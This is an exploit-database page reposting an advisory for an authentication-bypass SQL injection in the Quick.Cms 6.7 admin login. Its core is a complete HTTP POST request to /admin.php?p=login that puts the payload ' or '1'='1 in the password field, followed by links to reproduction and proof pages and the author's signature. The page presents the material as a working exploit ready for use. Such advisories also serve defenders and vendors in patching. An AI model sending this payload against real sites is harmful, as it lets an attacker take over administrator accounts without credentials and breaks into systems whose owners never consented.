Advertisement






Quick-Cms_v6.7-en-2023-update SQLi

CVE Category Price Severity
CVE-2023-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2024-03-24
CPE
cpe:/a:quick-cms:quick-cms:6.7
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.7489 0.87245

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030056

Below is a copy:

Quick-Cms_v6.7-en-2023-update SQLi
## Title: Quick-Cms_v6.7-en-2023-update SQLi
## Author: nu11secur1ty
## Date: 03/19/2024
## Vendor: https://opensolution.org/
## Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter is vulnerable to SQLi bypass authentication!

STATUS: HIGH - CRITICAL Vulnerability

[+]Exploit:
```POST
POST /admin.php?p=login HTTP/1.1
Host: localpwnedhost.com
Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
Content-Length: 92
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localpwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localpwnedhost.com/admin.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/opensolution.org/Quick-Cms_v6.7)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/quick-cmsv67-en-updated-2023-08-01-sqli.html)

## Time spent:
00:17:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.